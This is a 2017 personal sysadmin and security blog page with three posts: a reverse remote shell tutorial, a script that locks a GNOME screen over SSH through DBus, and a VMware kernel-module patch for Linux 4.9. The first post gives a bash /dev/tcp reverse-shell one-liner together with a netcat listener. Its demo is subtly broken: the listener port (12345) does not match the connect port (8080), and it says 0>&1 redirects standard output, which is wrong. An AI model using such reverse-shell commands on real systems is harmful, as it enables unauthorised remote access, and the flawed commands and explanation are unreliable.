Tuesday, March 28, 2017

Tip: Quick and cirty reverse remote shell

Here is how to get reverse remote shell. I say reverse because the remote system is connecting to you. I'll demonstrate it on a single machine for simplicity. So, open a terminal and run the following command in it:
nc -l 12345
This will start netcat which will listen on port 12345. Then, in the second terminal, run the following command:
/bin/bash -c bash -i >& /dev/tcp/127.0.0.1/8080 0>&1
You won't notice anything in the first window where nc command is running, but try to enter some command there, e.g. pwd. :) What you've got, is remote shell. Obviously, because of the way things work you don't get prompt and other fancy stuff, but it works and that's important. :)

What you basically did is that you run interactive bash process (the option -i) with standard error and standard output redirected to /dev/tcp/127.0.0.1/8080 (redirection operator >&) and also standard output being redirected to the same file (the last 0>&1). The file being redirected to and from is a special notation for the bash shell that allows it to open connections, i.e. the syntax is:
/dev/<protocol>/<ipaddress>/<port>
More details can be found in bash manual page.

Saturday, February 25, 2017

Lock remote deskop over ssh

I had a seemingly simple problem, connect over SSH to remote computer and lock the screen. Simple Google search for "gnome lock screen" yielded a plenty of results all of which revolving about using command gnome-screensaver-command -l.  First of, the package gnome-screensaver isn't installed by default on Fedora, meaning it isn't used there. Then, after installing it I got the following error message:
** Message: Failed to get session bus: Error spawning command line 'dbus-launch --autolaunch=062fabbac04041679f56c8db8593c352 --binary-syntax --close-stderr': Child process exited with code 1
Ok, turns out that session DBus is inaccessible and that gnome-screensaver-command just sends a message over DBus. Using d-feet it was easy to find out object, interface and method to use to lock the screen, but how to access DBus was a bit harder. The easy part was to find out that the key is in environment variable DBUS_SESSION_BUS_ADDRESS which has to point to a DBus daemon socket. But harder was to find where this socket is by looking into usual places on the file system. Finally, turned out that the easiest was to look at the environment of an existing process and get value from there, i.e.:
$ cat /proc/`pidof gnome-shell`/environ | \
              tr '\0' '\n' | grep DBUS_SESSION_BUS_ADDRESS
DBUS_SESSION_BUS_ADDRESS=unix:abstract=/tmp/dbus-dl1GC6PYCt,guid=33abd4a9e6bb3dee9262121d5819bdf1
tr command is necessary because entries in the environment are separated by NULL character (i.e. they are strings in C), so we are changing them into new line. Finally, grep just takes out the entry we are interested in. BTW, sorry for the useless cat use, but it is leftover as I constructed the command. :)

When you have properly set environment variable to access DBus, it is easy to invoke method Lock() that locks the screen, i.e.:
dbus-send --print-reply --session \
          --type=method_call --reply-timeout=3000 \
          --dest='org.gnome.ScreenSaver' \
          /org/gnome/ScreenSaver \
          org.gnome.ScreenSaver.Lock
and that will lock the screen. What's left to do is just to glue everything into a script:
#!/bin/bash
PID=`pidof gnome-shell`
DBUS_SESSION_BUS_ADDRESS=$(tr '\0' '\n' < /proc/${PID}/environ | grep "DBUS_SESSION_BUS_ADDRESS" | cut -d "=" -f 2-) \
dbus-send --print-reply --session --type=method_call --reply-timeout=3000 --dest='org.gnome.ScreenSaver' /org/gnome/ScreenSaver org.gnome.ScreenSaver.Lock
Just copy that into a file, make it executable and try it. It should work every time. :)

Monday, January 30, 2017

Fedora 25, kernel 4.9 and VMWare Workstation 12.5.2

Well, after upgrading Fedora 25 which included kernel 4.9.5, VMWare Workstation stopped working again! The fix is easy, even though it annoying to constantly have to patch something in VMWare. Anyway, the procedure - taken from here - is:
  1. Switch to root account.
  2. Go to /usr/lib/vmware/modules/source.
  3. Make backup of files vmmon.tar and vmnet.tar.
  4. Unpack those files using 'tar xf' command.
  5. Patch file vmnet-only/user_if.c, i.e. you have to open it in you favorite text editor and in function UserifLockPage() that's around line 113 change the following part:
    #if LINUX_VERSION_CODE >= KERNEL_VERSION(4, 6, 0)
        retval = get_user_pages(addr, 1, 1, 0, &page, NULL);
    #else
        retval = get_user_pages(current, current->mm, addr,
                    1, 1, 0, &page, NULL);
    #endif
    with the following:
    #if LINUX_VERSION_CODE >= KERNEL_VERSION(4, 9, 0)
         retval = get_user_pages(addr, 1, 0, &page, NULL);
    #else
    #if LINUX_VERSION_CODE >= KERNEL_VERSION(4, 6, 0)
         retval = get_user_pages(addr, 1, 1, 0, &page, NULL);
    #else
         retval = get_user_pages(current, current->mm, addr,
                     1, 1, 0, &page, NULL);
    #endif
    #endif
  6. Then, in file vmmon-only/linux/hostif.c in function HostIFGetUserPages() that's around line 1158, change the following
    #if LINUX_VERSION_CODE >= KERNEL_VERSION(4, 6, 0)
       retval = get_user_pages((unsigned long)uvAddr, numPages, 0, 0, ppages, NULL);
    #else
       retval = get_user_pages(current, current->mm, (unsigned long)uvAddr,
                               numPages, 0, 0, ppages, NULL);
    #endif
    with
    #if LINUX_VERSION_CODE >= KERNEL_VERSION(4, 9, 0)
       retval = get_user_pages((unsigned long)uvAddr, numPages, 0, ppages, NULL);
    #else
    #if LINUX_VERSION_CODE >= KERNEL_VERSION(4, 6, 0)
       retval = get_user_pages((unsigned long)uvAddr, numPages, 0, 0, ppages, NULL);
    #else
       retval = get_user_pages(current, current->mm, (unsigned long)uvAddr,
                               numPages, 0, 0, ppages, NULL);
    #endif
    #endif
  7. Create new vmmon.tar and vmnet.tar using the following commands:
    tar cf vmnet.tar vmnet-only
    tar cf vmmon.tar vmmon-only
  8. Start vmware as you would normally start it. This will trigger module compilation and everything should work.
Note that you are doing everything at you own risk! :)

About Me

scientist, consultant, security specialist, networking guy, system administrator, philosopher ;)